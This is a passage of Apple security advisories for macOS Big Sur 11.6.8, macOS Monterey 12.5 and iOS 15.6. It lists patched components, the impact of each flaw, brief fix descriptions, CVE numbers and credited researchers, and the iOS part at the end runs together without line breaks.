CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py_Cat) of Baidu  
Security, Mickey Jin (@patch1t) of Trend Micro

AppleScript  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-32853: Ye Zhang (@co0py_Cat) of Baidu Security  
CVE-2022-32851: Ye Zhang (@co0py_Cat) of Baidu Security

AppleScript  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-32831: Ye Zhang (@co0py_Cat) of Baidu Security

Audio  
Available for: macOS Big Sur  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32825: John Aakerblom (@jaakerblom)

Audio  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-32820: an anonymous researcher

Calendar  
Available for: macOS Big Sur  
Impact: An app may be able to access sensitive user information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

Calendar  
Available for: macOS Big Sur  
Impact: An app may be able to access user-sensitive data  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2022-32849: Joshua Jones

CoreText  
Available for: macOS Big Sur  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32839: STAR Labs (@starlabs_sg)

FaceTime  
Available for: macOS Big Sur  
Impact: An app with root privileges may be able to access private  
information  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-32781: Wojciech Reguła (@_r3ggi) of SecuRing

File System Events  
Available for: macOS Big Sur  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32819: Joshua Mason of Mandiant

ICU  
Available for: macOS Big Sur  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

ImageIO  
Available for: macOS Big Sur  
Impact: Processing an image may lead to a denial-of-service  
Description: A null pointer dereference was addressed with improved  
validation.  
CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2022-32811: ABC Research s.r.o

Kernel  
Available for: macOS Big Sur  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32815: Xinru Chi of Pangu Lab  
CVE-2022-32813: Xinru Chi of Pangu Lab

libxml2  
Available for: macOS Big Sur  
Impact: An app may be able to leak sensitive user information  
Description: A memory initialization issue was addressed with  
improved memory handling.  
CVE-2022-32823

PackageKit  
Available for: macOS Big Sur  
Impact: An app may be able to modify protected parts of the file  
system  
Description: An issue in the handling of environment variables was  
addressed with improved validation.  
CVE-2022-32786: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Big Sur  
Impact: An app may be able to modify protected parts of the file  
system  
Description: This issue was addressed with improved checks.  
CVE-2022-32800: Mickey Jin (@patch1t)

PluginKit  
Available for: macOS Big Sur  
Impact: An app may be able to read arbitrary files  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

PS Normalizer  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted Postscript file may result  
in unexpected app termination or disclosure of process memory  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

Software Update  
Available for: macOS Big Sur  
Impact: A user in a privileged network position can track a user’s  
activity  
Description: This issue was addressed by using HTTPS when sending  
information over the network.  
CVE-2022-32857: Jeffrey Paul (sneak.berlin)

Spindump  
Available for: macOS Big Sur  
Impact: An app may be able to overwrite arbitrary files  
Description: This issue was addressed with improved file handling.  
CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

Spotlight  
Available for: macOS Big Sur  
Impact: An app may be able to gain elevated privileges  
Description: A validation issue in the handling of symlinks was  
addressed with improved validation of symlinks.  
CVE-2022-26704: Joshua Mason of Mandiant

TCC  
Available for: macOS Big Sur  
Impact: An app may be able to access sensitive user information  
Description: An access issue was addressed with improvements to the  
sandbox.  
CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)  
of Tencent Security Xuanwu Lab (xlab.tencent.com)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating Vim.  
CVE-2022-0156  
CVE-2022-0158

Wi-Fi  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32847: Wang Yu of Cyberserval

Windows Server  
Available for: macOS Big Sur  
Impact: An app may be able to capture a user’s screen  
Description: A logic issue was addressed with improved checks.  
CVE-2022-32848: Jeremy Legendre of MacEnhance

macOS Big Sur 11.6.8 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYf6sACgkQeC9qKD1p  
rhgOJBAAtzyKOqdTnnBbwbFoG/HoZIbCVSVOtI5VIGH1weMQ72R3X2tXB5yTlpto  
3l/eoMe0/covxipiZ+CvTh9tM5ZfV3IxN4bpsbxew1R/s81YE2K55dFp5+4zzqgh  
YyWrx8SntngP9PywAdKa+GRZrW7R95oNp2UTwifcQvFPs40F/OPrNQm23Xkmqsx0  
zNNvMmqPaeCU8mgIOadO/uv626LjnkyKdwHKM3VBxGmklNEddQDjjoWcYugH7QYj  
e28EpKINEYfGVP/5n4uSeP6+kXmJj9nLzdKzfBD78gyBu5NX3Ai5Wh1BbsFMoFYE  
wcqlgEjMk3440babLb9kSRm81NX+EPgJLtjVPNRIrqs8pTh95CcDTRsotDUDl03R  
BrP6XGyXiS+3XyhdbamJDG9pCthJdo455XaYOlmzgIfgTJMkX3kdxiMAgGvbkPVl  
3IesUuChRvi6pZwTWXN4k5Rn9epZSV+9HaYplnFPScJpYeLzUKThz1P2KbMTd0CT  
fiBU+fxwQqfzGRX3gyzRz0DMqiGdk0PnO9pfWND+9lQDyht7s73XnZrVOnPZHGYC  
tiNdrEHm+4WKaEwl/5invCZ8vPaiJ9cTH/aSbeRkeqR8ilDQMIhm2xooSP8Sd00E  
gTOoTOANfxrOqkFWhj0HQEq5OmCeALkE8BqiLuOVVIrN4e2LgPg=  
=6wU+  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-07-20-3

Apple Security Advisory 2022-07-20-2 - macOS Monterey 12.5 addresses bypass, code execution, information leakage, null pointer, out of bounds read, out of bounds write, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-07-20-2 macOS Monterey 12.5

macOS Monterey 12.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213345.

APFS  
Available for: macOS Monterey  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32832: Tommy Muir (@Muirey03)

AppleMobileFileIntegrity  
Available for: macOS Monterey  
Impact: An app may be able to gain root privileges  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32810: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-32840: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with improved checks.  
CVE-2022-32845: Mohamed Ghannam (@_simo36)

AppleScript  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py_Cat) of Baidu  
Security, Mickey Jin (@patch1t) of Trend Micro

AppleScript  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-32851: Ye Zhang (@co0py_Cat) of Baidu Security  
CVE-2022-32852: Ye Zhang (@co0py_Cat) of Baidu Security  
CVE-2022-32853: Ye Zhang (@co0py_Cat) of Baidu Security

AppleScript  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-32831: Ye Zhang (@co0py_Cat) of Baidu Security

Audio  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-32820: an anonymous researcher

Audio  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32825: John Aakerblom (@jaakerblom)

Automation  
Available for: macOS Monterey  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved checks.  
CVE-2022-32789: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

Calendar  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

CoreMedia  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom  
(@jaakerblom)

CoreText  
Available for: macOS Monterey  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32839: STAR Labs (@starlabs_sg)

File System Events  
Available for: macOS Monterey  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32819: Joshua Mason of Mandiant

GPU Drivers  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: Multiple out-of-bounds write issues were addressed with  
improved bounds checking.  
CVE-2022-32793: an anonymous researcher

GPU Drivers  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-32821: John Aakerblom (@jaakerblom)

iCloud Photo Library  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user information  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2022-32849: Joshua Jones

ICU  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32841: hjy79425575  
ImageIO  
Available for: macOS Monterey  
Impact: Processing an image may lead to a denial-of-service  
Description: A null pointer dereference was addressed with improved  
validation.  
CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2022-32811: ABC Research s.r.o

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

Kernel  
Available for: macOS Monterey  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32813: Xinru Chi of Pangu Lab  
CVE-2022-32815: Xinru Chi of Pangu Lab

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-32817: Xinru Chi of Pangu Lab

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-32829: an anonymous researcher

Liblouis  
Available for: macOS Monterey  
Impact: An app may cause unexpected app termination or arbitrary code  
execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China  
(nipc.org.cn)

libxml2  
Available for: macOS Monterey  
Impact: An app may be able to leak sensitive user information  
Description: A memory initialization issue was addressed with  
improved memory handling.  
CVE-2022-32823

Multi-Touch  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A type confusion issue was addressed with improved  
checks.  
CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

Multi-Touch  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A type confusion issue was addressed with improved state  
handling.  
CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file  
system  
Description: An issue in the handling of environment variables was  
addressed with improved validation.  
CVE-2022-32786: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file  
system  
Description: This issue was addressed with improved checks.  
CVE-2022-32800: Mickey Jin (@patch1t)

PluginKit  
Available for: macOS Monterey  
Impact: An app may be able to read arbitrary files  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

PS Normalizer  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted Postscript file may result  
in unexpected app termination or disclosure of process memory  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

SMB  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-32796: Sreejith Krishnan R (@skr0x1c0)

SMB  
Available for: macOS Monterey  
Impact: An app may be able to gain elevated privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-32842: Sreejith Krishnan R (@skr0x1c0)

SMB  
Available for: macOS Monterey  
Impact: An app may be able to gain elevated privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-32798: Sreejith Krishnan R (@skr0x1c0)

SMB  
Available for: macOS Monterey  
Impact: A user in a privileged network position may be able to leak  
sensitive information  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-32799: Sreejith Krishnan R (@skr0x1c0)

SMB  
Available for: macOS Monterey  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32818: Sreejith Krishnan R (@skr0x1c0)

Software Update  
Available for: macOS Monterey  
Impact: A user in a privileged network position can track a user’s  
activity  
Description: This issue was addressed by using HTTPS when sending  
information over the network.  
CVE-2022-32857: Jeffrey Paul (sneak.berlin)

Spindump  
Available for: macOS Monterey  
Impact: An app may be able to overwrite arbitrary files  
Description: This issue was addressed with improved file handling.  
CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

Spotlight  
Available for: macOS Monterey  
Impact: An app may be able to gain root privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-32801: Joshua Mason (@josh@jhu.edu)

subversion  
Available for: macOS Monterey  
Impact: Multiple issues in subversion  
Description: Multiple issues were addressed by updating subversion.  
CVE-2021-28544: Evgeny Kotkov, visualsvn.com  
CVE-2022-24070: Evgeny Kotkov, visualsvn.com  
CVE-2022-29046: Evgeny Kotkov, visualsvn.com  
CVE-2022-29048: Evgeny Kotkov, visualsvn.com

TCC  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user information  
Description: An access issue was addressed with improvements to the  
sandbox.  
CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)  
of Tencent Security Xuanwu Lab (xlab.tencent.com)

WebKit  
Available for: macOS Monterey  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 239316  
CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro Zero  
Day Initiative

WebRTC  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution.  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 242339  
CVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence team

Wi-Fi  
Available for: macOS Monterey  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32837: Wang Yu of Cyberserval

Wi-Fi  
Available for: macOS Monterey  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32847: Wang Yu of Cyberserval

Windows Server  
Available for: macOS Monterey  
Impact: An app may be able to capture a user’s screen  
Description: A logic issue was addressed with improved checks.  
CVE-2022-32848: Jeremy Legendre of MacEnhance

Additional recognition

802.1X  
We would like to acknowledge Shin Sun of National Taiwan University  
for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła  
(@_r3ggi) of SecuRing for their assistance.

Calendar  
We would like to acknowledge Joshua Jones for their assistance.

configd  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła  
(@_r3ggi) of SecuRing for their assistance.

DiskArbitration  
We would like to acknowledge Mike Cush for their assistance.

macOS Monterey 12.5 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYiL4ACgkQeC9qKD1p  
rhhjpQ//TQX1ihtXRIjFpPOViMy6IxuLE1CsKFxq5MweXelbPB/UdeUl/zL5G54b  
/Lx2XYKoWj6u27FCO0BHxBqtYbAd6sfx70VLCk5W6gyk/yCi0n3zh7BvRvWB/Ugh  
6NuHB39a1kbbjLLoQPbW0L6egdrCfqP/+ZujqjKl7xI58nda9jMHJC1ns87KQoDn  
Er5SAGf7M2ErGNzOFqvXjpJYvGsrKJyfqNxp99H/sPlzu7URX9Gq3f3n1o55IUUa  
mcxlBPDfUmDQPjdSqw/BprQkDOvp0fzmTy+phB0fkgmvVJ8EmEJAoilL4SyH4uW9  
V1GD9rtjUKh7G/gSFAo7y0HBDQoM+E9hA+4PPlH2o1nUOAl6BRWUka6jf4yaqrpr  
pfo1K2hPQj1g4MMZFCDWkJ+7V1+1GTQ9WlagL5gB3QaKefiSG4cTnL06Y8zn38TD  
TY3JrdqUI7Pzugu+FuHs7P168yNIGXTscb1ptrVlaVBaVuyICmEcKX4HS+I5o30q  
WqCOaRoaa6WRqBwNEy7zVAExjSPt7t8ZWt85avWSt+rLxNGiVkPrpHu4fE+V2IAV  
fz1VA4S/w69h9uJHXdcG+QfvNxX+zj/vljF6DK3dyQ957Mqfyr2y9ojSbdf6vo4n  
DJFXNxbEk35loy/kDDidC1C1sFKY+JeQF7ZBi0/QOyuSdSdJrSg=  
=ibIr  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-07-20-2

Apple Security Advisory 2022-07-20-1 - iOS 15.6 and iPadOS 15.6 addresses buffer overflow, bypass, code execution, information leakage, null pointer, out of bounds read, out of bounds write, and spoofing vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-07-20-1 iOS 15.6 and iPadOS 15.6iOS 15.6 and iPadOS 15.6 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213346.APFSAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app with root privileges may be able to execute arbitrarycode with kernel privilegesDescription: The issue was addressed with improved memory handling.CVE-2022-32832: Tommy Muir (@Muirey03)AppleAVDAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A remote user may be able to cause kernel code executionDescription: A buffer overflow was addressed with improved boundschecking.CVE-2022-32788: Natalie Silvanovich of Google Project ZeroAppleAVDAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32824: Antonio Zekic (@antoniozekic) and John Aakerblom(@jaakerblom)AppleMobileFileIntegrityAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to gain root privilegesDescription: An authorization issue was addressed with improved statemanagement.CVE-2022-32826: Mickey Jin (@patch1t) of Trend MicroApple Neural EngineAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to break out of its sandboxDescription: This issue was addressed with improved checks.CVE-2022-32845: Mohamed Ghannam (@_simo36)Apple Neural EngineAvailable for devices with Apple Neural Engine: iPhone 8 and later,iPad Pro (3rd generation) and later, iPad Air (3rd generation) andlater, and iPad mini (5th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: This issue was addressed with improved checks.CVE-2022-32840: Mohamed Ghannam (@_simo36)CVE-2022-32829: an anonymous researcherApple Neural EngineAvailable for devices with Apple Neural Engine: iPhone 8 and later,iPad Pro (3rd generation) and later, iPad Air (3rd generation) andlater, and iPad mini (5th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2022-32810: Mohamed Ghannam (@_simo36)AudioAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-32820: an anonymous researcherAudioAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32825: John Aakerblom (@jaakerblom)CoreMediaAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom(@jaakerblom)CoreTextAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A remote user may cause an unexpected app termination orarbitrary code executionDescription: The issue was addressed with improved bounds checks.CVE-2022-32839: STAR Labs (@starlabs_sg)File System EventsAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to gain root privilegesDescription: A logic issue was addressed with improved statemanagement.CVE-2022-32819: Joshua Mason of MandiantGPU DriversAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to disclose kernel memoryDescription: Multiple out-of-bounds write issues were addressed withimproved bounds checking.CVE-2022-32793: an anonymous researcherGPU DriversAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A memory corruption issue was addressed with improvedvalidation.CVE-2022-32821: John Aakerblom (@jaakerblom)HomeAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A user may be able to view restricted content from the lockscreenDescription: A logic issue was addressed with improved statemanagement.CVE-2022-32855: an anonymous researcheriCloud Photo LibraryAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to access sensitive user informationDescription: An information disclosure issue was addressed byremoving the vulnerable code.CVE-2022-32849: Joshua JonesICUAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: An out-of-bounds write issue was addressed with improvedbounds checking.CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs& DNSLab, Korea Univ.ImageIOAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing a maliciously crafted image may result indisclosure of process memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32841: hjy79425575ImageIOAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing a maliciously crafted file may lead to arbitrarycode executionDescription: A logic issue was addressed with improved checks.CVE-2022-32802: Ivan Fratric of Google Project Zero, Mickey Jin(@patch1t)ImageIOAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing a maliciously crafted image may lead to disclosureof user informationDescription: An out-of-bounds read issue was addressed with improvedbounds checking.CVE-2022-32830: Ye Zhang (@co0py_Cat) of Baidu SecurityImageIOAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing an image may lead to a denial-of-serviceDescription: A null pointer dereference was addressed with improvedvalidation.CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)IOMobileFrameBufferAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2022-26768: an anonymous researcherKernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app with root privileges may be able to execute arbitrarycode with kernel privilegesDescription: The issue was addressed with improved memory handling.CVE-2022-32813: Xinru Chi of Pangu LabCVE-2022-32815: Xinru Chi of Pangu LabKernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to disclose kernel memoryDescription: An out-of-bounds read issue was addressed with improvedbounds checking.CVE-2022-32817: Xinru Chi of Pangu LabKernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app with arbitrary kernel read and write capability may beable to bypass Pointer AuthenticationDescription: A logic issue was addressed with improved statemanagement.CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)KernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app with arbitrary kernel read and write capability may beable to bypass Pointer AuthenticationDescription: A race condition was addressed with improved statehandling.CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)LiblouisAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may cause unexpected app termination or arbitrary codeexecutionDescription: This issue was addressed with improved checks.CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China(nipc.org.cn)libxml2Available for: iPhone 6s and later, iPad Pro 